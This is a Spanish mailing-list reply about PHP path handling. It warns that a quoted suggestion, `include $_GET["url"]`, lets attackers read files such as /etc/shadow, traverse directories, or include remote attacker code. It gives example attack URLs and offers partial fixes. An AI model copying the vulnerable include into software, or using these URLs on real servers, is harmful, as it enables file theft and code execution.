Nuria, lo que te dijeron de usar constantes o variables en php
funciona bien. O poner todas las url absolutas (por ejemplo en los css
para las imágenes de fondo).

Y al final del mail, una pequeña advertencia.

On 10/17/06, Pablo Viojo <[EMAIL PROTECTED]> wrote:
> Nuria:
>
> Una forma de evitar este problema es tener un archivo index.php en la raiz
> de tu servidor que reciba un parametro "url" que defina la pagina que
> quieres servir. Por ejemplo, si quieres mostrar la pagina primero/fiesta.php
> tendrías que llamarla como /index.php?url=primero/fiesta.php, de ese modo
> todas las rutas que pongas en el html se computaran a partir de donde tengas
> el index.php y no desde la página que estes mostrando.
>
> El código del index.php debería ser algo como
>
> <?php
>
>      include $_GET["url"];
>
> ?>

CUIDADÍN!!! imaginate esta dirección:
http://tu-servidor.com/index.php?url=/etc/shadow o
http://tu-servidor.com/index.php?url=http://sitio-de-script-kiddies.com/exploit.php.

En el primer caso un atacante malicioso podría acceder a cualquier
archivo del servidor (bueno, puntualizando, a cualquier archivo al que
el usuario con el que el servidor web se ejecuta tenga acceso) y en el
segundo, pueden ejecutar el código php que quieran en tu servidor (por
ejemplo, descargar algun programa en /tmp y ejecutarlo (con los mismos
permisos que se ejecuta el servidor web)).

soluciones:
  para ambos casos: include("pag_".$_GET['url'].".php");
  (algo como include("./".$_GET['url']); no funcionaria para el
segundo caso: 
http://tu-servidor.com/index.php?url=../../../../../../../../etc/shadow
)

  sólo para el segundo caso (aunque siempre aconsejable): desactivar
fopen_wrappers (o algo así) en php.ini (y reiniciar el servidor web).

saludos

-- 
Si no puedes deslumbrar con tu inteligencia,
desconcierta con tus gilipolleces
_______________________________________________
Lista de distribución Ovillo
Para escribir a la lista, envia un correo a Ovillo@lists.ovillo.org
Puedes modificar tus datos o desuscribirte en la siguiente dirección: 
http://lists.ovillo.org/mailman/listinfo/ovillo

Responder a